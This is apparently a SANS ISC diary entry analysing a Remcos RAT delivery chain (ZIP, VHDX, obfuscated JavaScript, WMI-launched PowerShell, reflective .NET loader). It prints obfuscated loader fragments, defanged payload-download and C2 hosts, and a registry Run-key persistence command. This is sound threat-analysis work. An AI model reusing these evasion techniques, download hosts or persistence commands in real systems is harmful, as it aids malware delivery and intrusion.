Yesterday, a reader reported to us a malicious ZIP archive (SHA256: a0104921a2d37ab87482ac9a9f5c3713479c118846c3e999178e75b81620c094[1<\/a>]). Once unzipped, it contains\u00a0a VHDX file that discloses\u00a0a malicious JavaScript after being mounted (which is automatic on modern Windows OSs):<\/p>\n Two different techniques to hide the payload help to bypass most first-line security controls. Using a disk image as a “malware container”\u00a0has been used multiple times in the past[2<\/a>] but seemed to be less used these days. That\u2019s why I decided to have a look at the JavaScript (SHA256:f65b1271deedcbcbcdd750047f8eb3a5548145546fc2b7847b263a5e52570b33[3<\/a>]) with a low VT score (only 5\/57). Called \u201cPartnerschaft_fur_neue_Angebotsanfrage.js\u201d (\u201cPartnership for new quotation request\u201d), it probably targets German speaking victims. It contains three stages to deliver the last piece of malware.<\/p>\n In the first stage, the JavaScript (obfuscated and hidden in many comments) will launch a PowerShell script through WMI:<\/p>\n This technique helps to bypass EDR solutions as well as classic detection rules that monitor parent-child relationships in processes. JavaScript \u2192\u00a0WMI \u2192\u00a0PowerShell is less suspicious than a direct relation JavaScript \u2192\u00a0PowerShell.<\/p>\n The PowerShell script is reconstructed from many strings concatenations and stored in “%LOCALAPPDATA%Tamale”:<\/p>\n \u00a0<\/p>\n The string \u201cbubble\u201d pollutes the code and is removed during execution..<\/p>\n This second stage PowerShell reconstructs strings by picking every 4th character from garbage strings. There is a function \u201cotidiform\u201d that decrypts Base64-encoded strings with the XOR key \u201cIdentificational\u201d (always the same key across all the scripts). Example:<\/p>\n Returns:<\/p>\n The script downloads the next stage from:<\/p>\n and saves it to %APPDATA%Endocoel.Pro.<\/p>\n This file (SHA256:9de90481e57ed0bc0f13bb24747e18cc133f497abe05cfac67517f98098048a1[4<\/a>]) looks interesting. When you have a first look at it, it seems to be encrypted. The classic behavior is to XOR and encode in Base64 the payload. Here it\u2019s a bit different, the next stage script has been appended at the end of the file. The payload is extracted by carving the interesting code with:<\/p>\n Once extracted the stage 3 is executed and use the first part of the file as payload (the first 143577 bytes). This stage is a PowerShell reflective .Net loader (classic behaviour) using\u00a0System.Reflection.Assembly.Load(). The shellcode will fetch the malware itself from:<\/p>\n The malware will be injected in a process “backgroundTaskHost.exe” and communicates with the C2 server:<\/p>\n The traffic has been identified by my sanbox as Remcos, a pretty common RAT.<\/p>\n Or course, persistence is configured via a Run key that executes the PowerShell loader:<\/p>\n Most of the files used in this infection path remain undetected by most AVs. Here is the complete infection path:<\/p>\n Email \u2192 ZIP\u00a0\u2192 VHDX\u00a0\u2192 JavaScript\u00a0\u2192 PowerShell Decoder \u2192 PowerShell (.Net Loader) \u2192 Shellcode (Downloader) \u2192 Remcos<\/p>\n [1]\u00a0https:\/\/www.virustotal.com\/gui\/file\/a0104921a2d37ab87482ac9a9f5c3713479c118846c3e999178e75b81620c094<\/a> Xavier Mertens (@xme)<\/b> (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n \t![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/isc-20260616-1.png?ssl=1\")
<\/p>\n\nWbemScripting.SWbemLocator \u2192 ConnectServer() \u2192 Win32_Process.Create()<\/pre>\n
\nFdselsdatoen = Fdselsdatoen + \"bubbleFFBVM0lNDgMWDREb' 1;$filmproducbubblentbubblers=otidiform 'DQsSABgGBw0lCBgM';$flygtningbubblelandsbybubbler=otidiform 'bRcOBwcCHw0NC\";\nFdselsdatoen = Fdselsdatoen + \"BoOChwPCTpKQQgdBQsZEQ4QHAwLDxgsFhZAPQcQBggEXE0JAgUJIBcAAFhNFRwAAgEFCgAVADBN';$succulbubblently=$pritchbubblel;otidiform 'bQMJARYIClMTExEa\";\nFdselsdatoen = Fdselsdatoen + \"DRcVCTsNBAIYEFdYW1xcPQodFUEZBREGVE0VHAACAQUKABUAME0=' 1;whilbubble (!$prbubblesbytbubblerially118) {otidiform 'bQMJARYIClMwFREfCgoOHi\";\n...<\/pre>\n\notidiform 'bQMJARYIClMWDxIAHAYNBSIBWDU1ChIAFQAABh0zW1YKFgAPAAwvBxAVFQcMC0lILwsXAxEHA0A=' 1<\/pre>\n
\n$global:unfishlike=[Activator]::CreateInstance($formene)<\/pre>\n
\nhxxps:\/\/cembusconfort[.]ro\/Exoticisms121.dsp<\/pre>\n
\n.substring(143578, 20305)<\/pre>\n
\nhxxps:\/\/cembusconfort[.]ro\/YoHtJ27.bin<\/pre>\n
\nanimal342[.]duckdns[.]org:53552<\/pre>\n
\nC:WindowsSystem32cmd.exe\" \/c REG ADD \"HKCUSoftwareMicrosoftWindowsCurrentVersionRun\" \/f \/v \"Startup key\" \/t REG_EXPAND_SZ \/d \"%Statskirken% -windowstyle 2 $Lnforhandlinger=(.'gp' 'HKCU:SoftwareWeaverbird').'Pardonnerer';%Statskirken% ($Lnforhandlinger)\"<\/pre>\n
\n[2]\u00a0https:\/\/isc.sans.edu\/diary\/obama224+distribution+Qakbot+tries+vhd+virtual+hard+disk+images\/29294<\/a>
\n[3]\u00a0https:\/\/www.virustotal.com\/gui\/file\/f65b1271deedcbcbcdd750047f8eb3a5548145546fc2b7847b263a5e52570b33<\/a>
\n[4]\u00a0https:\/\/www.virustotal.com\/gui\/file\/9de90481e57ed0bc0f13bb24747e18cc133f497abe05cfac67517f98098048a1\/content<\/a>???????<\/p>\n
\nXameco
\nSenior ISC Handler – Freelance Cyber Security Consultant
\nPGP Key<\/a><\/p>\n
\n
<\/BR><\/p>\n